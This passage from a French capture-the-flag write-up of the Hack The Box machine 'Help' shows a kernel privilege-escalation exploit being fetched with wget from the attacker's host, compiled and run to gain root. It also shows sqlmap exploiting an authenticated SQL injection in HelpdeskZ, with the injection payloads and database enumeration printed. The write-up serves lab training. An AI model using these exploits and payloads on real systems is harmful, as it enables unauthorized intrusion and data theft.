class="line"><span class="cl"> ╚════════════════════╝ </span></span><span class="line"><span class="cl">╔══════════╣ Operative system </span></span><span class="line"><span class="cl">╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits </span></span><span class="line"><span class="cl">Linux version 4.4.0-116-generic <span class="o">(</span>buildd@lgw01-amd64-021<span class="o">)</span> <span class="o">(</span>gcc version 5.4.0 <span class="m">20160609</span> <span class="o">(</span>Ubuntu 5.4.0-6ubuntu1~16.04.9<span class="o">)</span> <span class="o">)</span> <span class="c1">#140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018</span> </span></span><span class="line"><span class="cl">Distributor ID: Ubuntu </span></span><span class="line"><span class="cl">Description: Ubuntu 16.04.5 LTS </span></span><span class="line"><span class="cl">Release: 16.04 </span></span><span class="line"><span class="cl">Codename: xenial </span></span></code></pre></td></tr></table> </div> </div><p>J&rsquo;ai récupérer l&rsquo;exploit trouvé sur searchsploit :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">searchsploit 4.4.0-116 </span></span><span class="line"><span class="cl">- ------------------------------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title </span></span><span class="line"><span class="cl">- ------------------------------------------------------- </span></span><span class="line"><span class="cl">Linux Kernel &lt; 4.4.0-116 <span class="o">(</span>Ubuntu 16.04.4<span class="o">)</span> - Local Privilege Escalation </span></span></code></pre></td></tr></table> </div> </div><p>Il m&rsquo;a suffit ensuite de la télécharger sur la machine, de le compiler avec gcc puis de l&rsquo;executer afin d&rsquo;obtenir un shell en tant que root :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">help@help:~$ wget http://10.10.16.10:8000/44298.c </span></span><span class="line"><span class="cl">--2025-08-27 05:09:41-- http://10.10.16.10:8000/44298.c </span></span><span class="line"><span class="cl">Connecting to 10.10.16.10:8000... connected. </span></span><span class="line"><span class="cl">HTTP request sent, awaiting response... <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Length: <span class="m">5773</span> <span class="o">(</span>5.6K<span class="o">)</span> <span class="o">[</span>text/x-csrc<span class="o">]</span> </span></span><span class="line"><span class="cl">Saving to: ‘44298.c’ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">44298.c 100%<span class="o">[=====================================================================================================================</span>&gt;<span class="o">]</span> 5.64K --.-KB/s in 0.01s </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025-08-27 05:09:42 <span class="o">(</span><span class="m">384</span> KB/s<span class="o">)</span> - ‘44298.c’ saved <span class="o">[</span>5773/5773<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">help@help:~$ gcc 44298.c -o exploit </span></span><span class="line"><span class="cl">help@help:~$ chmod +x exploit </span></span><span class="line"><span class="cl">help@help:~$ ./exploit </span></span><span class="line"><span class="cl"><span class="nv">task_struct</span> <span class="o">=</span> ffff880015b98e00 </span></span><span class="line"><span class="cl"><span class="nv">uidptr</span> <span class="o">=</span> ffff8800192f7c04 </span></span><span class="line"><span class="cl">spawning root shell </span></span><span class="line"><span class="cl">root@help:~# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@help:~# cat /root/root.txt </span></span><span class="line"><span class="cl">924b.....f182 </span></span></code></pre></td></tr></table> </div> </div><h2 id="bonus">Bonus </h2><h3 id="cve--sql-injection-authenticated">CVE : SQL Injection (Authenticated) </h3><p>Dans un premier temps, on se connecte à HelpdeskZ à l&rsquo;aide des credentials trouvés sur Graphql. Ensuite, on poste un ticket avec une piece-jointe (pas de fichier php, n&rsquo;importe lequel suffit). Ensuite, on va dans nos tickets et on essaye de telecharger notre pièce-jointe. On intercepte la requête dans <strong>Burp</strong>, il suffit ensuite de l&rsquo;enregistrer dans un fichier puis de le passer en paramètre de <strong>sqlmap</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /support/?v<span class="o">=</span>view_tickets<span class="p">&amp;</span><span class="nv">action</span><span class="o">=</span>ticket<span class="p">&amp;</span>param<span class="o">[]=</span>8<span class="p">&amp;</span>param<span class="o">[]=</span>attachment<span class="p">&amp;</span>param<span class="o">[]=</span>5<span class="p">&amp;</span>param<span class="o">[]=</span><span class="m">10</span> HTTP/1.1 </span></span><span class="line"><span class="cl">Host: help.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Ubuntu<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:142.0<span class="o">)</span> Gecko/20100101 Firefox/142.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: fr,fr-FR<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.3 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://help.htb/support/?v<span class="o">=</span>view_tickets<span class="p">&amp;</span><span class="nv">action</span><span class="o">=</span>ticket<span class="p">&amp;</span>param<span class="o">[]=</span><span class="m">8</span> </span></span><span class="line"><span class="cl">Cookie: <span class="nv">lang</span><span class="o">=</span>english<span class="p">;</span> <span class="nv">PHPSESSID</span><span class="o">=</span>dh62bg5tt2j2gk4bofntn637q5<span class="p">;</span> <span class="nv">usrhash</span><span class="o">=</span>0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BEWTAAjyRu71c6GI%2BULmLmTqISzoi3A27eA1M9ErCXvXw%3D%3D </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span></code></pre></td></tr></table> </div> </div><p>On enregistre cette requete dans un fichier <strong>ticket.req</strong>.</p> <p>On execute <strong>sqlmap</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span><span class="lnt">174 </span><span class="lnt">175 </span><span class="lnt">176 </span><span class="lnt">177 </span><span class="lnt">178 </span><span class="lnt">179 </span><span class="lnt">180 </span><span class="lnt">181 </span><span class="lnt">182 </span><span class="lnt">183 </span><span class="lnt">184 </span><span class="lnt">185 </span><span class="lnt">186 </span><span class="lnt">187 </span><span class="lnt">188 </span><span class="lnt">189 </span><span class="lnt">190 </span><span class="lnt">191 </span><span class="lnt">192 </span><span class="lnt">193 </span><span class="lnt">194 </span><span class="lnt">195 </span><span class="lnt">196 </span><span class="lnt">197 </span><span class="lnt">198 </span><span class="lnt">199 </span><span class="lnt">200 </span><span class="lnt">201 </span><span class="lnt">202 </span><span class="lnt">203 </span><span class="lnt">204 </span><span class="lnt">205 </span><span class="lnt">206 </span><span class="lnt">207 </span><span class="lnt">208 </span><span class="lnt">209 </span><span class="lnt">210 </span><span class="lnt">211 </span><span class="lnt">212 </span><span class="lnt">213 </span><span class="lnt">214 </span><span class="lnt">215 </span><span class="lnt">216 </span><span class="lnt">217 </span><span class="lnt">218 </span><span class="lnt">219 </span><span class="lnt">220 </span><span class="lnt">221 </span><span class="lnt">222 </span><span class="lnt">223 </span><span class="lnt">224 </span><span class="lnt">225 </span><span class="lnt">226 </span><span class="lnt">227 </span><span class="lnt">228 </span><span class="lnt">229 </span><span class="lnt">230 </span><span class="lnt">231 </span><span class="lnt">232 </span><span class="lnt">233 </span><span class="lnt">234 </span><span class="lnt">235 </span><span class="lnt">236 </span><span class="lnt">237 </span><span class="lnt">238 </span><span class="lnt">239 </span><span class="lnt">240 </span><span class="lnt">241 </span><span class="lnt">242 </span><span class="lnt">243 </span><span class="lnt">244 </span><span class="lnt">245 </span><span class="lnt">246 </span><span class="lnt">247 </span><span class="lnt">248 </span><span class="lnt">249 </span><span class="lnt">250 </span><span class="lnt">251 </span><span class="lnt">252 </span><span class="lnt">253 </span><span class="lnt">254 </span><span class="lnt">255 </span><span class="lnt">256 </span><span class="lnt">257 </span><span class="lnt">258 </span><span class="lnt">259 </span><span class="lnt">260 </span><span class="lnt">261 </span><span class="lnt">262 </span><span class="lnt">263 </span><span class="lnt">264 </span><span class="lnt">265 </span><span class="lnt">266 </span><span class="lnt">267 </span><span class="lnt">268 </span><span class="lnt">269 </span><span class="lnt">270 </span><span class="lnt">271 </span><span class="lnt">272 </span><span class="lnt">273 </span><span class="lnt">274 </span><span class="lnt">275 </span><span class="lnt">276 </span><span class="lnt">277 </span><span class="lnt">278 </span><span class="lnt">279 </span><span class="lnt">280 </span><span class="lnt">281 </span><span class="lnt">282 </span><span class="lnt">283 </span><span class="lnt">284 </span><span class="lnt">285 </span><span class="lnt">286 </span><span class="lnt">287 </span><span class="lnt">288 </span><span class="lnt">289 </span><span class="lnt">290 </span><span class="lnt">291 </span><span class="lnt">292 </span><span class="lnt">293 </span><span class="lnt">294 </span><span class="lnt">295 </span><span class="lnt">296 </span><span class="lnt">297 </span><span class="lnt">298 </span><span class="lnt">299 </span><span class="lnt">300 </span><span class="lnt">301 </span><span class="lnt">302 </span><span class="lnt">303 </span><span class="lnt">304 </span><span class="lnt">305 </span><span class="lnt">306 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">------------------------------------------------ </span></span><span class="line"><span class="cl">$ sqlmap -r ticket.req --batch --dbs --thread <span class="m">10</span> </span></span><span class="line"><span class="cl"> ___ </span></span><span class="line"><span class="cl"> __H__ </span></span><span class="line"><span class="cl"> ___ ___<span class="o">[</span><span class="s1">&#39;]_____ ___ ___ {1.9.3.3#dev} </span></span></span><span class="line"><span class="cl"><span class="s1">|_ -| . [.] | .&#39;</span><span class="p">|</span> . <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>___<span class="p">|</span>_ <span class="o">[</span><span class="s1">&#39;]_|_|_|__,| _| </span></span></span><span class="line"><span class="cl"><span class="s1"> |_|V... |_| https://sqlmap.org </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&#39;</span>s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible <span class="k">for</span> any misuse or damage caused by this program </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> starting @ 14:37:53 /2025-08-27/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:53<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> parsing HTTP request from <span class="s1">&#39;ticket.req&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:53<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resuming back-end DBMS <span class="s1">&#39;mysql&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:53<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> testing connection to the target URL </span></span><span class="line"><span class="cl">sqlmap resumed the following injection point<span class="o">(</span>s<span class="o">)</span> from stored session: </span></span><span class="line"><span class="cl">--- </span></span><span class="line"><span class="cl">Parameter: param<span class="o">[]</span> <span class="o">(</span>GET<span class="o">)</span> </span></span><span class="line"><span class="cl"> Type: boolean-based blind </span></span><span class="line"><span class="cl"> Title: AND boolean-based blind - WHERE or HAVING clause </span></span><span class="line"><span class="cl"> Payload: <span class="nv">v</span><span class="o">=</span>view_tickets<span class="p">&amp;</span><span class="nv">action</span><span class="o">=</span>ticket<span class="p">&amp;</span>param<span class="o">[]=</span>8<span class="p">&amp;</span>param<span class="o">[]=</span>attachment<span class="p">&amp;</span>param<span class="o">[]=</span>5<span class="p">&amp;</span>param<span class="o">[]=</span><span class="m">10</span> AND <span class="nv">2859</span><span class="o">=</span><span class="m">2859</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Type: time-based blind </span></span><span class="line"><span class="cl"> Title: MySQL &gt;<span class="o">=</span> 5.0.12 AND time-based blind <span class="o">(</span>query SLEEP<span class="o">)</span> </span></span><span class="line"><span class="cl"> Payload: <span class="nv">v</span><span class="o">=</span>view_tickets<span class="p">&amp;</span><span class="nv">action</span><span class="o">=</span>ticket<span class="p">&amp;</span>param<span class="o">[]=</span>8<span class="p">&amp;</span>param<span class="o">[]=</span>attachment<span class="p">&amp;</span>param<span class="o">[]=</span>5<span class="p">&amp;</span>param<span class="o">[]=</span><span class="m">10</span> AND <span class="o">(</span>SELECT <span class="m">7344</span> FROM <span class="o">(</span>SELECT<span class="o">(</span>SLEEP<span class="o">(</span>5<span class="o">)))</span>Tifo<span class="o">)</span> </span></span><span class="line"><span class="cl">--- </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:53<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> the back-end DBMS is MySQL </span></span><span class="line"><span class="cl">web server operating system: Linux Ubuntu 16.10 or 16.04 <span class="o">(</span>yakkety or xenial<span class="o">)</span> </span></span><span class="line"><span class="cl">web application technology: Apache 2.4.18 </span></span><span class="line"><span class="cl">back-end DBMS: MySQL &gt;<span class="o">=</span> 5.0.12 </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:53<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> fetching database names </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:53<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> fetching number of databases </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:53<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">5</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:54<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:54<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">18</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:58<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: information_schema </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:58<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>14:37:58<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">5</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>14:38:00<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: mysql </span></span><span class="line"><span class="cl"><span class="o">[</span>14:38:00<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>14:38:00<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">18</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>14:38:03<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: performance_schema </span></span><span class="line"><span class="cl"><span class="o">[</span>14:38:03<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>14:38:03<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">7</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>14:38:06<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: support </span></span><span class="line"><span class="cl"><span class="o">[</span>14:38:06<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>14:38:06<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">3</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>14:38:07<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: sys </span></span><span class="line"><span class="cl">available databases <span class="o">[</span>5<span class="o">]</span>: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> information_schema </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> mysql </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> performance_schema </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> support </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> sys </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>14:38:07<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> fetched data logged to text files under <span class="s1">&#39;/root/.local/share/sqlmap/output/help.htb&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ending @ 14:38:07 /2025-08-27/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------------------------------- </span></span><span class="line"><span class="cl">$ sqlmap -r ticket.req --batch --thread <span class="m">10</span> -D support --tables </span></span><span class="line"><span class="cl"> ___ </span></span><span class="line"><span class="cl"> __H__ </span></span><span class="line"><span class="cl"> ___ ___<span class="o">[</span><span class="s2">&#34;]_____ ___ ___ {1.9.3.3#dev} </span></span></span><span class="line"><span class="cl"><span class="s2">|_ -| . [.] | .&#39;| . | </span></span></span><span class="line"><span class="cl"><span class="s2">|___|_ [)]_|_|_|__,| _| </span></span></span><span class="line"><span class="cl"><span class="s2"> |_|V... |_| https://sqlmap.org </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[*] starting @ 14:38:50 /2025-08-27/ </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[14:38:50] [INFO] parsing HTTP request from &#39;ticket.req&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[14:38:50] [INFO] resuming back-end DBMS &#39;mysql&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[14:38:50] [INFO] testing connection to the target URL </span></span></span><span class="line"><span class="cl"><span class="s2">sqlmap resumed the following injection point(s) from stored session: </span></span></span><span class="line"><span class="cl"><span class="s2">--- </span></span></span><span class="line"><span class="cl"><span class="s2">Parameter: param[] (GET) </span></span></span><span class="line"><span class="cl"><span class="s2"> Type: boolean-based blind </span></span></span><span class="line"><span class="cl"><span class="s2"> Title: AND boolean-based blind - WHERE or HAVING clause </span></span></span><span class="line"><span class="cl"><span class="s2"> Payload: v=view_tickets&amp;action=ticket&amp;param[]=8&amp;param[]=attachment&amp;param[]=5&amp;param[]=10 AND 2859=2859 </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2"> Type: time-based blind </span></span></span><span class="line"><span class="cl"><span class="s2"> Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP) </span></span></span><span class="line"><span class="cl"><span class="s2"> Payload: v=view_tickets&amp;action=ticket&amp;param[]=8&amp;param[]=attachment&amp;param[]=5&amp;param[]=10 AND (SELECT 7344 FROM (SELECT(SLEEP(5)))Tifo) </span></span></span><span class="line"><span class="cl"><span class="s2">--- </span></span></span><span class="line"><span class="cl"><span class="s2">[14:38:51] [INFO] the back-end DBMS is MySQL </span></span></span><span class="line"><span class="cl"><span class="s2">web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial) </span></span></span><span class="line"><span class="cl"><span class="s2">web application technology: Apache 2.4.18 </span></span></span><span class="line"><span class="cl"><span class="s2">back-end DBMS: MySQL &gt;= 5.0.12 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:38:51] [INFO] fetching tables for database: &#39;support&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[14:38:51] [INFO] fetching number of tables for database &#39;support&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[14:38:51] [INFO] retrieved: 19 </span></span></span><span class="line"><span class="cl"><span class="s2">... </span></span></span><span class="line"><span class="cl"><span class="s2">... </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:34] [INFO] retrieved: 5 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:36] [INFO] retrieved: staff </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:36] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:36] [INFO] retrieved: 7 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:39] [INFO] retrieved: tickets </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:39] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:39] [INFO] retrieved: 16 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:42] [INFO] retrieved: tickets_messages </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:42] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:42] [INFO] retrieved: 5 </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:44] [INFO] retrieved: users </span></span></span><span class="line"><span class="cl"><span class="s2">Database: support </span></span></span><span class="line"><span class="cl"><span class="s2">[19 tables] </span></span></span><span class="line"><span class="cl"><span class="s2">+------------------------+ </span></span></span><span class="line"><span class="cl"><span class="s2">| articles | </span></span></span><span class="line"><span class="cl"><span class="s2">| attachments | </span></span></span><span class="line"><span class="cl"><span class="s2">| canned_response | </span></span></span><span class="line"><span class="cl"><span class="s2">| custom_fields | </span></span></span><span class="line"><span class="cl"><span class="s2">| departments | </span></span></span><span class="line"><span class="cl"><span class="s2">| emails | </span></span></span><span class="line"><span class="cl"><span class="s2">| error_log | </span></span></span><span class="line"><span class="cl"><span class="s2">| file_types | </span></span></span><span class="line"><span class="cl"><span class="s2">| knowledgebase_category | </span></span></span><span class="line"><span class="cl"><span class="s2">| login_attempt | </span></span></span><span class="line"><span class="cl"><span class="s2">| login_log | </span></span></span><span class="line"><span class="cl"><span class="s2">| news | </span></span></span><span class="line"><span class="cl"><span class="s2">| pages | </span></span></span><span class="line"><span class="cl"><span class="s2">| priority | </span></span></span><span class="line"><span class="cl"><span class="s2">| settings | </span></span></span><span class="line"><span class="cl"><span class="s2">| staff | </span></span></span><span class="line"><span class="cl"><span class="s2">| tickets | </span></span></span><span class="line"><span class="cl"><span class="s2">| tickets_messages | </span></span></span><span class="line"><span class="cl"><span class="s2">| users | </span></span></span><span class="line"><span class="cl"><span class="s2">+------------------------+ </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[14:39:44] [INFO] fetched data logged to text files under &#39;/root/.local/share/sqlmap/output/help.htb&#39; </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[*] ending @ 14:39:44 /2025-08-27/ </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">---------------------------------------------------------------------- </span></span></span><span class="line"><span class="cl">$<span class="s2"> 